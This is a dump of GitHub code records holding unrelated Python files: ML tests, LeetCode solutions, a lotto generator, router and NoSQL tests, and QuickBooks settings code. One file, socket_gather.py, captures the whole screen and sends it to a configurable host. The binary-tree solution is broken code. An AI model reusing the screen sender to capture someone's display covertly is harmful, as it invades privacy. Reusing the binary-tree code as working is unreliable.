conv1_stride_s=1,\r\n pool1_stride_s=1,\r\n inflate=(0, 1, 1),\r\n spatial_strides=(2, 2, 2),\r\n temporal_strides=(1, 1, 2),\r\n dilations=(1, 1, 1),\r\n num_classes=60,\r\n in_channels_head=512,\r\n spatial_type='avg',\r\n dropout_ratio=0.5\r\n )\r\nprint(\"model success\")\r\n# for param in model.trainable_params():\r\n# print(param)\r\nmodel.set_train(False)\r\nfor param in model.trainable_params():\r\n print(param)\r\n\r\nparam_dict = mindspore.load_checkpoint(\"../chpk_resume/posec3d_2d.ckpt\")\r\nfor i in param_dict:\r\n print(param_dict[i])\r\nmindspore.load_param_into_net(model, param_dict)\r\nprint(\"chpk success\")\r\n\r\nval(dataset_val, model)\r\nprint(\"val success\")\r\n","repo_name":"MysticFace-0/st_gcn_mindspore","sub_path":"test/PoseC3D_2d.py","file_name":"PoseC3D_2d.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26955900252","text":"# 124. Binary Tree Maximum Path Sum\n# Hard\n\n# A path in a binary tree is a sequence of nodes where each pair of adjacent nodes in the sequence has an edge connecting them. A node can only appear in the sequence at most once. Note that the path does not need to pass through the root.\n\n# The path sum of a path is the sum of the node's values in the path.\n\n# Given the root of a binary tree, return the maximum path sum of any non-empty path.\n\n \n\n# Example 1:\n\n\n# Input: root = [1,2,3]\n# Output: 6\n# Explanation: The optimal path is 2 -> 1 -> 3 with a path sum of 2 + 1 + 3 = 6.\n# Example 2:\n\n\n# Input: root = [-10,9,20,null,null,15,7]\n# Output: 42\n# Explanation: The optimal path is 15 -> 20 -> 7 with a path sum of 15 + 20 + 7 = 42.\n \ndef __init__(self):\n self.maxSum=float('-inf')\ndef maxPathSum(root):\n def traverse(root):\n if root:\n left=traverse(root.left)\n right=traverse(root.right)\n self.maxSum=max(self.maxSum,root.val,root.val + left, root.val + right, root.val + left + right)\n return max(root.val, root.val + left.root.val + right)\n else:\n return 0\n traverse(root)\n return self.maxSum\n\n\nif __name__ == \"__main__\":\n root=[1,2,3]\n print (\"{}\".format(maxPathSum(root)))","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/09112023/binary_tree_maximum_path_sum.py","file_name":"binary_tree_maximum_path_sum.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35228338890","text":"T = [2,9,3,1,7,11,9,6,7,7,1,3,9,12,15]\nN = len(T)\n\nmaxi = -1\n\nfor i in range(N):\n for j in range(N-1, -1, -1):\n\n if T[i] == T[j]:\n\n current = 1\n k = 1\n\n while i + k < N and j - k >= 0 and T[i+k] == T[j-k]:\n k+=1\n current+=1\n \n if current > maxi:\n maxi = current\n\nprint(maxi)\n\n#łał to kurwa z palca zadzialalo troche w szoku jestem ngl","repo_name":"JakubFr4czek/WDI","sub_path":"Zestaw3/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74751424573","text":"import os\nimport json\nimport random\nimport email_ticket\n\n\ndef main():\n print('\\n')\n\n play = input('Which game would you like to play? ').lower()\n amount_tickets = int(input('How many tickets would you like? '))\n email_receipt = input(\"Would you like to send an email of the tickets? (yes/no) \").lower()\n\n while amount_tickets != 0:\n picks = gen_lotto_numbers(play)\n ticket = print_ticket(picks)\n\n if email_receipt == 'yes':\n player = input(\"Enter your email address: \")\n html_tickets = f\"

Hi,
Your ticket is:
{ticket}

\"\n email_ticket.send_email(player, \"Your Python Generated Lotto Numbers\", ticket, html_tickets)\n else:\n print(ticket)\n\n amount_tickets -= 1\n\n\ndef load_contest():\n directory = os.path.dirname(__file__)\n filename = os.path.join(directory, 'config_contests.json')\n\n if not os.path.exists(filename):\n return {}\n\n with open(filename, 'r', encoding='utf-8') as fin:\n return json.load(fin)\n\n\ndef gen_lotto_numbers(choice):\n contest_rules = load_contest()\n lotto_numbers = []\n\n if choice == 'megaball':\n index = 0\n elif choice == 'powerball':\n index = 1\n elif choice == 'eurojackpot':\n index = 2\n else:\n print('Pick a game.')\n\n game = contest_rules['contests'][index]['name']\n ball_amount = contest_rules['contests'][index]['amount'] + 1\n special_ball = contest_rules['contests'][index]['extra']\n first_ball = contest_rules['contests'][index]['start']\n last_ball = contest_rules['contests'][index]['end']\n first_special = contest_rules['contests'][index]['extra_start']\n last_special = contest_rules['contests'][index]['extra_end']\n\n\n print(f'Loading config for {game}')\n print('Printing ticket.....\\n')\n\n for ball in range(1, ball_amount):\n current_pick = random.randint(first_ball, last_ball)\n\n while current_pick in lotto_numbers:\n current_pick = random.randint(first_ball, last_ball)\n\n lotto_numbers.append(current_pick)\n\n for special in range(special_ball):\n lotto_numbers.append(random.randint(first_special, last_special))\n\n return lotto_numbers\n\n\ndef print_ticket(numbers):\n pretty_ticket = \"\"\n for idx, ball in enumerate(numbers):\n pretty_ticket += f'Number {idx + 1} is {ball}, \\n'\n\n return pretty_ticket\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbettenh/lotto","sub_path":"lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2115931775","text":"# 1) Basic - \n# Print all integers from 0 to 150.\n\ndef basic(): \n for i in range(151):\n print(i)\n\nbasic()\n\n# 2) # Multiples of Five - \n# Print all the multiples of 5 from 5 to 1, 000\n\ndef multiples():\n for i in range(5, 1001, 5): \n#format(starting number, end number, multiples of)\n print(i)\n\nmultiples()\n\n# 3) Counting, the Dojo Way - Print integers 1 to 100. \n# If divisible by 5, print \"Coding\" instead. \n# If divisible by 10, print \"Coding Dojo\".\n\ndef DojoWay():\n for i in range(1, 101):\n if i % 10 == 0:\n print(\"Coding Dojo\")\n elif i % 5 == 0:\n print(\"Coding\")\n else: \n print(i)\n\nDojoWay()\n\n# 4) Whoa. That Sucker's Huge -\n# Add odd integers from 0 to 500,000, and \n# print the final sum.\n\ndef whoa():\n final_sum = 0\n for i in range(1, 500000, 2):\n final_sum += i\n print(final_sum)\n\nwhoa()\n\n# 5) Countdown by Fours - \n# Print positive numbers starting at 2018, \n# counting down by fours.\n\ndef countdown():\n for i in range(2018, 0, -4):\n print(i)\n\ncountdown()\n\n# 6) Flexible Counter - \n# Set three variables: lowNum, highNum, mult. \n# Starting at lowNum and going through highNum, \n# print only the integers that are a multiple of mult. \n# For example, if lowNum=2, highNum=9, and mult=3, \n# the loop should print 3, 6, 9 (on successive lines)\n\ndef flexible_counter(low_num, high_num, mult):\n for i in range(low_num, high_num + 1):\n if i % mult == 0:\n print(i)\n\nflexible_counter(1, 21, 3)\n\n\n\n","repo_name":"jxxparker/Python","sub_path":"Fundamentals/2_ForLoopBasic1/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33251931331","text":"def get_score():\n s = int(input(\"请输入学生成绩: \"))\n assert 0 <= s <= 100,'成绩超出范围'\n #等同于if bool(): raise AssertionError()\n return s\ntry:\n score = get_score()\n print(\"学生的成绩是\",score)\nexcept AssertionError as err:\n print(err)","repo_name":"wangredfei/nt_py","sub_path":"Base/ex14/lx8_score.py","file_name":"lx8_score.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8634393638","text":"from unittest import TestCase\n\nfrom flode.di.container import Container\nfrom flode.http_context_builder import HttpContextBuilder\nfrom flode.http_method import HttpMethod\nfrom flode.http_status import HttpStatus\nfrom flode.middleware.endpoint.endpoint import Endpoint\nfrom flode.middleware.endpoint.endpoint_result import EndpointResult\nfrom flode.middleware.router.route import Route\nfrom flode.middleware.router.route_pattern import RoutePattern\nfrom flode.middleware.router.router import Router\nfrom flode.middleware.router.router_options import RouterOptions\n\n\nclass TestRouter(TestCase):\n def test_get_routes_return_list_of_added_routes(self) -> None:\n class FirstController:\n @Route()\n def first_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n @Route(\"/nested\")\n def second_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n class SecondController:\n @Route()\n def first_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n @Route(\"/nested\")\n def second_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n opts = RouterOptions()\n opts.add_endpoint(\"/first\", FirstController)\n opts.add_endpoint(\"/second\", SecondController)\n router = Router(opts, Container())\n\n expected_routes = [RoutePattern(\"/first\"), RoutePattern(\"/first/nested\"), RoutePattern(\"/second\"),\n RoutePattern(\"/second/nested\")]\n self.assertEqual(expected_routes, router.get_routes())\n\n def test_response_status_is_set_to_404_not_found_when_no_endpoint_could_be_found_for_path(self) -> None:\n router = Router(RouterOptions(), Container())\n context = HttpContextBuilder().path(\"/user/profile\").build()\n router.handle_request(context)\n self.assertEqual(HttpStatus.NOT_FOUND, context.response.status)\n\n def test_endpoint_is_set_on_context_when_matching_request_path(self) -> None:\n class MyController:\n @Route()\n def my_method(self) -> EndpointResult: return EndpointResult(\"\")\n\n container = Container()\n opts = RouterOptions()\n opts.add_endpoint(\"/test\", MyController)\n router = Router(opts, container)\n context = HttpContextBuilder().path(\"/test\").build()\n router.handle_request(context)\n controller = container.get_service(MyController)\n expected_endpoint = Endpoint(controller.my_method, Route(\"/test\"))\n self.assertEqual(expected_endpoint, context.get_endpoint())\n\n def test_endpoints_can_specify_what_http_methods_they_support(self) -> None:\n class MyController:\n @Route(http_methods=[HttpMethod.GET])\n def get_method(self) -> EndpointResult:\n return EndpointResult(\"GET method\")\n\n @Route(http_methods=[HttpMethod.POST])\n def post_method(self) -> EndpointResult:\n return EndpointResult(\"POST method\")\n\n container = Container()\n opts = RouterOptions()\n opts.add_endpoint(\"/\", MyController)\n router = Router(opts, container)\n controller = container.get_service(MyController)\n\n get_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.GET).build()\n post_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.POST).build()\n router.handle_request(get_context)\n router.handle_request(post_context)\n\n expected_get_endpoint = Endpoint(controller.get_method, Route())\n expected_post_endpoint = Endpoint(controller.post_method, Route(http_methods=[HttpMethod.POST]))\n self.assertEqual(expected_get_endpoint, get_context.get_endpoint())\n self.assertEqual(expected_post_endpoint, post_context.get_endpoint())\n\n def test_endpoints_can_support_multiple_http_methods(self) -> None:\n class MyController:\n @Route(http_methods=[HttpMethod.GET, HttpMethod.POST, HttpMethod.DELETE])\n def multi_method(self) -> EndpointResult:\n return EndpointResult(\"MULTI METHOD\")\n\n container = Container()\n opts = RouterOptions()\n opts.add_endpoint(\"/\", MyController)\n router = Router(opts, container)\n controller = container.get_service(MyController)\n\n get_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.GET).build()\n post_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.POST).build()\n delete_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.DELETE).build()\n router.handle_request(get_context)\n router.handle_request(post_context)\n router.handle_request(delete_context)\n expected_endpoint = Endpoint(controller.multi_method, Route(http_methods=[HttpMethod.GET, HttpMethod.POST,\n HttpMethod.DELETE]))\n self.assertEqual(expected_endpoint, get_context.get_endpoint())\n self.assertEqual(expected_endpoint, post_context.get_endpoint())\n self.assertEqual(expected_endpoint, delete_context.get_endpoint())\n","repo_name":"diddi-/flode","sub_path":"tests/unit/flode/middleware/router/test_router.py","file_name":"test_router.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16449166440","text":"#coding:utf-8\nfrom socket import *\nimport os\nimport struct\nimport base64\nimport zlib\nimport json\nimport sys\nfrom PIL import Image\nfrom PIL import ImageGrab\nimport core\n\nfilename = 'test.txt'\n\n#file_size = struct.calcsize\n\ndef startSend(data,param):\n j = json.loads(param)\n tmp = base64.b64encode(data)\n tmp = zlib.compress(tmp)\n addr = (j[\"ip\"],int(j[\"port\"]))\n try:\n sendSock = socket(AF_INET,SOCK_STREAM)\n sendSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)\n sendSock.connect(addr)\n sendSock.send(tmp)\n sendSock.close()\n js = \"top.connectLog('%s')\" % \"发送完毕\";\n core.runJs(js)\n except:\n (ErrorType, ErrorValue, ErrorTB) = sys.exc_info()\n (errno, err_msg) = ErrorValue\n error = \"连接服务器失败: %s, errno=%d\" % (err_msg, errno)\n js = \"top.connectLog('%s')\" % error;\n core.runJs(js)\n\ndef readFile(filename):\n file = open(filename,\"rb\")\n return file.read()\n\ndef sendFile(filename,param):\n data = readFile(filename)\n startSend(data,param)\n\ndef grab():\n im = ImageGrab.grab()\n im.save(\"tmp.jpeg\",'jpeg')\n\ndef startGrab(param):\n grab()\n sendFile(\"tmp.jpeg\",param)\n return \"ok\"\nif __name__ == '__main__':\n startGrab(\"{\\\"ip\\\":\\\"127.0.0.1\\\",\\\"port\\\":\\\"8000\\\"\")\n\n","repo_name":"xuedev/HGui_Python_Win32","sub_path":"plugins/socket_gather.py","file_name":"socket_gather.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"75144009851","text":"import unittest\nfrom time import time\n\nfrom borneo import (\n Consistency, GetRequest, IllegalArgumentException, PutRequest, TableLimits,\n TableNotFoundException, TableRequest, TimeToLive, TimeUnit)\nfrom parameters import table_name, timeout\nfrom test_base import TestBase\nfrom testutils import get_row\n\nrow = None\ntb_expect_expiration = None\nversion = None\nserial_version = 0\n\n\n# noinspection PyArgumentEqualDefault\nclass TestGet(unittest.TestCase, TestBase):\n @classmethod\n def setUpClass(cls):\n cls.set_up_class()\n table_ttl = TimeToLive.of_hours(16)\n create_statement = (\n 'CREATE TABLE ' + table_name + '(fld_sid INTEGER, fld_id INTEGER, \\\nfld_long LONG, fld_float FLOAT, fld_double DOUBLE, fld_bool BOOLEAN, \\\nfld_str STRING, fld_bin BINARY, fld_time TIMESTAMP(7), fld_num NUMBER, \\\nfld_json JSON, fld_arr ARRAY(STRING), fld_map MAP(STRING), \\\nfld_rec RECORD(fld_id LONG, fld_bool BOOLEAN, fld_str STRING), \\\nPRIMARY KEY(SHARD(fld_sid), fld_id)) USING TTL ' + str(table_ttl))\n create_request = TableRequest().set_statement(\n create_statement).set_table_limits(TableLimits(100, 100, 1))\n cls.table_request(create_request)\n global row, tb_expect_expiration, version\n row = get_row()\n put_request = PutRequest().set_value(row).set_table_name(table_name)\n version = cls.handle.put(put_request).get_version()\n tb_expect_expiration = table_ttl.to_expiration_time(\n int(round(time() * 1000)))\n global serial_version\n serial_version = cls.handle.get_client().serial_version\n\n @classmethod\n def tearDownClass(cls):\n cls.tear_down_class()\n\n def setUp(self):\n self.set_up()\n self.key = {'fld_sid': 1, 'fld_id': 1}\n self.get_request = GetRequest().set_key(self.key).set_table_name(\n table_name).set_timeout(timeout)\n\n def tearDown(self):\n self.tear_down()\n\n def testGetSetIllegalKey(self):\n self.assertRaises(IllegalArgumentException, self.get_request.set_key,\n 'IllegalKey')\n self.get_request.set_key({'fld_sid': 1})\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n self.get_request.set_key({'fld_id': 1})\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalKeyFromJson(self):\n self.assertRaises(ValueError, self.get_request.set_key_from_json,\n 'IllegalJson')\n self.get_request.set_key_from_json('{\"invalid_field\": \"key\"}')\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalTableName(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_table_name, {'name': table_name})\n self.get_request.set_table_name('IllegalTable')\n self.assertRaises(TableNotFoundException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalCompartment(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_compartment, {})\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_compartment, '')\n\n def testGetSetIllegalConsistency(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_consistency,\n 'IllegalConsistency')\n\n def testGetSetIllegalTimeout(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, 'IllegalTimeout')\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, 0)\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, -1)\n\n def testGetWithoutKey(self):\n self.get_request.set_key(None)\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetGets(self):\n self.assertEqual(self.get_request.get_key(), self.key)\n self.assertIsNone(self.get_request.get_compartment())\n\n def testGetIllegalRequest(self):\n self.assertRaises(IllegalArgumentException, self.handle.get,\n 'IllegalRequest')\n\n def testGetNormal(self):\n result = self.handle.get(self.get_request)\n self.check_get_result(result, row, version, tb_expect_expiration,\n TimeUnit.HOURS, True, (serial_version > 2))\n self.check_cost(result, 1, 2, 0, 0)\n\n def testGetEventual(self):\n self.get_request.set_consistency(Consistency.EVENTUAL)\n result = self.handle.get(self.get_request)\n self.check_get_result(\n result, row, expect_expiration=tb_expect_expiration,\n timeunit=TimeUnit.HOURS, ver_eq=False,\n mod_time_recent=(serial_version > 2))\n self.check_cost(result, 1, 1, 0, 0)\n\n def testGetNonExisting(self):\n self.get_request.set_key({'fld_sid': 2, 'fld_id': 2})\n result = self.handle.get(self.get_request)\n self.check_get_result(result)\n self.check_cost(result, 1, 2, 0, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"oracle/nosql-python-sdk","sub_path":"test/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"13341858597","text":"def solver(arr):\n ans = []\n if len(arr) == 1:\n return [arr[:]]\n \n for i in range(len(arr)):\n popped = arr.pop(0)\n perms = solver(arr)\n\n for perm in perms:\n perm.append(popped)\n \n ans.extend(perms)\n arr.append(popped)\n\n return ans\n\narr = [1,2,3]\nprint(solver(arr))","repo_name":"joemama2021/Local-Codes__LeetCode__","sub_path":"arrypermutations.py","file_name":"arrypermutations.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29412924660","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:IronmanJay\n# email:1975686676@qq.com\n\nclass Solution:\n def minimumRecolors(self, blocks: str, k: int) -> int:\n sumW = 0\n for i in range(k):\n if blocks[i] == 'W':\n sumW += 1\n res = sumW\n for i in range(k,len(blocks)):\n if blocks[i] == 'W':\n sumW += 1\n if blocks[i - k] == 'W':\n sumW -= 1\n res = min(res,sumW)\n return res\n\nif __name__ == '__main__':\n solution = Solution()\n blocks = \"WBBWWBBWBW\"\n k = 7\n res = solution.minimumRecolors(blocks,k)\n print(res)\n","repo_name":"IronmanJay/Python_Project","sub_path":"LeetCode/SlidingWindow/p2379_MinimumRecolorsToGetKConsecutiveBlackBlocks.py","file_name":"p2379_MinimumRecolorsToGetKConsecutiveBlackBlocks.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"6904322829","text":"\"\"\"Reorder List\n\nLEETCODE: 143\nCOMPANY: LinkedIn\n\nYou are given the head of a singly linked-list. The list can \nbe represented as:\n\nL0 → L1 → … → Ln - 1 → Ln\nReorder the list to be on the following form:\n\nL0 → Ln → L1 → Ln - 1 → L2 → Ln - 2 → …\nYou may not modify the values in the list's nodes. Only nodes \nthemselves may be changed.\n\nInput: head = [1,2,3,4]\nOutput: [1,4,2,3]\n\nInput: head = [1,2,3,4,5]\nOutput: [1,5,2,4,3]\n\n\nSolution\n- What we will need to do is split the list in half to be able\n to alternate the list index being returned.\n- In the second half of the split list, we reverse the order \n of the links so it starts at the end and works backwards.\n- In order to be able to split the list in half correctly, we \n create two pointers that will be placed on the 1st and 2nd \n index values. We will move pointer1 (slow pointer) by one, \n while we move pointer2 (fast pointer) by two spaces.\n- If there are even elements in the linked list then the two \n lists will be split evenly. If the number of elements are odd\n then pointer1 will always have the most amount of elements.\n- The slow pointer (pointer1) will always stop at the half-way \n mark, and the fast pointer (pointer2) will stop when there are \n no more elements to loop through. \n- To be able to shift the pointers after breaking the links, we\n would have to create a temporary variable that will store \n the proceeding node before the link is broken. This allows us \n to still acees the node values after we break the link and \n shift our pointers to the next node.\n\"\"\"\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n # find middle\n slow, fast = head, head.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n # reverse second half\n second = slow.next\n prev = slow.next = None\n while second:\n tmp = second.next\n second.next = prev\n prev = second\n second = tmp\n\n # merge two halfs\n first, second = head, prev\n while second:\n tmp1, tmp2 = first.next, second.next\n first.next = second\n second.next = tmp1\n first, second = tmp1, tmp2\n","repo_name":"SinclairPythonAkoto/Algorithms","sub_path":"Alogorithm_Roadmap/6_Linked_List/reorder_list.py","file_name":"reorder_list.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37910389868","text":"import torch\nfrom einops import repeat\n\nfrom src.diffusion.timestep_sampler.diffusion_timestep_sampler import DiffusionTimestepSampler\n\n\nclass PartialSampler(DiffusionTimestepSampler):\n \"\"\"\n Partial sampler:\n\n Constant over a fixed portion of the sequence (e.g second half/quarter) and 0 everywhere else\n \"\"\"\n\n def __init__(self, max_timestep: int = 1000, start_fraction: float = 0.5, end_fraction: float = 1):\n \"\"\"\n Args:\n max_timestep: Maximum timestep to sample\n start_fraction: Fraction of the sequence to start the constant portion\n end_fraction: Fraction of the sequence to end the constant portion\n \"\"\"\n super().__init__(max_timestep=max_timestep)\n self.start_fraction = start_fraction\n self.end_fraction = end_fraction\n\n def sample_timesteps(self, input_size: torch.Size = None) -> torch.LongTensor:\n \"\"\"\n Args:\n input_size [B, S, D]: Shape of the input tensor, used to determine the batch size and sequence length\n\n Returns:\n Long Tenor [B]: Only one timestep per batch\n \"\"\"\n tx = torch.zeros(input_size[0], input_size[1]).long()\n start = int(self.start_fraction * input_size[1])\n end = int(self.end_fraction * input_size[1])\n t = torch.randint(0, self.max_timestep, (input_size[0],)).long()\n t = repeat(t, \"b -> b s\", s=end - start)\n tx[:, start:end] = t\n return tx\n","repo_name":"rkstgr/jukebox_diffusion","sub_path":"src/diffusion/timestep_sampler/partial_sampler.py","file_name":"partial_sampler.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30426987408","text":"import base64\nimport json\nfrom typing import Dict\n\nimport requests\nfrom django.conf import settings\nfrom future.moves.urllib.parse import urlencode\nfrom fyle_accounting_mappings.models import MappingSetting\nfrom qbosdk import InternalServerError, NotFoundClientError, UnauthorizedClientError, WrongParamsError\n\nfrom apps.fyle.models import ExpenseGroupSettings\nfrom apps.mappings.queue import (\n schedule_auto_map_ccc_employees,\n schedule_auto_map_employees,\n schedule_bill_payment_creation,\n schedule_tax_groups_creation,\n)\nfrom apps.quickbooks_online.queue import schedule_qbo_objects_status_sync, schedule_reimbursements_sync\nfrom apps.workspaces.models import WorkspaceGeneralSettings\nfrom fyle_qbo_api.utils import assert_valid\n\n\ndef generate_qbo_refresh_token(authorization_code: str, redirect_uri: str) -> str:\n \"\"\"\n Generate QBO refresh token from authorization code\n \"\"\"\n api_data = {'grant_type': 'authorization_code', 'code': authorization_code, 'redirect_uri': redirect_uri}\n\n auth = '{0}:{1}'.format(settings.QBO_CLIENT_ID, settings.QBO_CLIENT_SECRET)\n auth = base64.b64encode(auth.encode('utf-8'))\n\n request_header = {'Accept': 'application/json', 'Content-type': 'application/x-www-form-urlencoded', 'Authorization': 'Basic {0}'.format(str(auth.decode()))}\n\n token_url = settings.QBO_TOKEN_URI\n response = requests.post(url=token_url, data=urlencode(api_data), headers=request_header)\n\n if response.status_code == 200:\n return json.loads(response.text)['refresh_token']\n\n elif response.status_code == 401:\n raise UnauthorizedClientError('Wrong client secret or/and refresh token', response.text)\n\n elif response.status_code == 404:\n raise NotFoundClientError('Client ID doesn\\'t exist', response.text)\n\n elif response.status_code == 400:\n raise WrongParamsError('Some of the parameters were wrong', response.text)\n\n elif response.status_code == 500:\n raise InternalServerError('Internal server error', response.text)\n\n\ndef create_or_update_general_settings(general_settings_payload: Dict, workspace_id):\n \"\"\"\n Create or update general settings\n :param workspace_id:\n :param general_settings_payload: general settings payload\n :return:\n \"\"\"\n assert_valid('reimbursable_expenses_object' in general_settings_payload and general_settings_payload['reimbursable_expenses_object'], 'reimbursable_expenses_object field is blank')\n\n assert_valid('employee_field_mapping' in general_settings_payload and general_settings_payload['employee_field_mapping'], 'employee_field_mapping field is blank')\n\n if 'auto_map_employees' in general_settings_payload and general_settings_payload['auto_map_employees']:\n assert_valid(general_settings_payload['auto_map_employees'] in ['EMAIL', 'NAME', 'EMPLOYEE_CODE'], 'auto_map_employees can have only EMAIL / NAME / EMPLOYEE_CODE')\n\n if general_settings_payload['auto_create_destination_entity']:\n assert_valid(general_settings_payload['auto_map_employees'] and general_settings_payload['employee_field_mapping'] == 'VENDOR', 'auto_create_destination_entity can be set only if auto map is enabled and employee mapped to vendor')\n\n if general_settings_payload['je_single_credit_line']:\n assert_valid(\n general_settings_payload['reimbursable_expenses_object'] == 'JOURNAL ENTRY' or general_settings_payload['corporate_credit_card_expenses_object'] == 'JOURNAL ENTRY',\n 'je_single_credit_line can be set only if reimbursable_expenses_object or \\\n corporate_credit_card_expenses_object is JOURNAL ENTRY',\n )\n\n if general_settings_payload['sync_fyle_to_qbo_payments'] or general_settings_payload['sync_qbo_to_fyle_payments']:\n assert_valid(\n general_settings_payload['reimbursable_expenses_object'] == 'BILL',\n 'sync_fyle_to_qbo_payments / sync_qbo_to_fyle_payments can be set \\\n only if reimbursable_expenses_object is BILL',\n )\n\n workspace_general_settings = WorkspaceGeneralSettings.objects.filter(workspace_id=workspace_id).first()\n\n map_merchant_to_vendor = True\n\n if workspace_general_settings:\n map_merchant_to_vendor = workspace_general_settings.map_merchant_to_vendor\n\n # TODO: remove this hack once workspace settings are saved\n if workspace_id == 98:\n category_sync_version = 'v1'\n else:\n category_sync_version = workspace_general_settings.category_sync_version if workspace_general_settings else 'v2'\n\n general_settings, _ = WorkspaceGeneralSettings.objects.update_or_create(\n workspace_id=workspace_id,\n category_sync_version=category_sync_version,\n defaults={\n 'employee_field_mapping': general_settings_payload['employee_field_mapping'],\n 'import_projects': general_settings_payload['import_projects'],\n 'import_categories': general_settings_payload['import_categories'],\n 'import_tax_codes': general_settings_payload['import_tax_codes'],\n 'change_accounting_period': general_settings_payload['change_accounting_period'],\n 'charts_of_accounts': general_settings_payload['charts_of_accounts'],\n 'auto_map_employees': general_settings_payload['auto_map_employees'],\n 'auto_create_destination_entity': general_settings_payload['auto_create_destination_entity'],\n 'auto_create_merchants_as_vendors': general_settings_payload['auto_create_merchants_as_vendors'],\n 'reimbursable_expenses_object': general_settings_payload['reimbursable_expenses_object'] if 'reimbursable_expenses_object' in general_settings_payload and general_settings_payload['reimbursable_expenses_object'] else None,\n 'corporate_credit_card_expenses_object': general_settings_payload['corporate_credit_card_expenses_object']\n if 'corporate_credit_card_expenses_object' in general_settings_payload and general_settings_payload['corporate_credit_card_expenses_object']\n else None,\n 'sync_fyle_to_qbo_payments': general_settings_payload['sync_fyle_to_qbo_payments'],\n 'sync_qbo_to_fyle_payments': general_settings_payload['sync_qbo_to_fyle_payments'],\n 'map_merchant_to_vendor': map_merchant_to_vendor,\n 'je_single_credit_line': general_settings_payload['je_single_credit_line'],\n 'map_fyle_cards_qbo_account': general_settings_payload['map_fyle_cards_qbo_account'],\n 'import_vendors_as_merchants': general_settings_payload['import_vendors_as_merchants'],\n },\n )\n\n if general_settings.map_merchant_to_vendor and general_settings.corporate_credit_card_expenses_object in ('CREDIT CARD PURCHASE', 'DEBIT CARD EXPENSE'):\n expense_group_settings = ExpenseGroupSettings.objects.get(workspace_id=workspace_id)\n expense_group_settings.import_card_credits = True if general_settings.corporate_credit_card_expenses_object == 'CREDIT CARD PURCHASE' else False\n\n ccc_expense_group_fields = expense_group_settings.corporate_credit_card_expense_group_fields\n ccc_expense_group_fields.append('expense_id')\n expense_group_settings.corporate_credit_card_expense_group_fields = list(set(ccc_expense_group_fields))\n expense_group_settings.ccc_export_date_type = 'spent_at'\n\n expense_group_settings.save()\n\n if general_settings.corporate_credit_card_expenses_object == 'JOURNAL ENTRY' or general_settings.reimbursable_expenses_object in ('JOURNAL ENTRY', 'EXPENSE'):\n expense_group_settings = ExpenseGroupSettings.objects.get(workspace_id=workspace_id)\n expense_group_settings.import_card_credits = True\n expense_group_settings.save()\n\n schedule_tax_groups_creation(import_tax_codes=general_settings.import_tax_codes, workspace_id=workspace_id)\n\n schedule_auto_map_employees(general_settings_payload['auto_map_employees'], workspace_id)\n\n schedule_auto_map_ccc_employees(workspace_id)\n\n schedule_bill_payment_creation(general_settings.sync_fyle_to_qbo_payments, workspace_id)\n\n 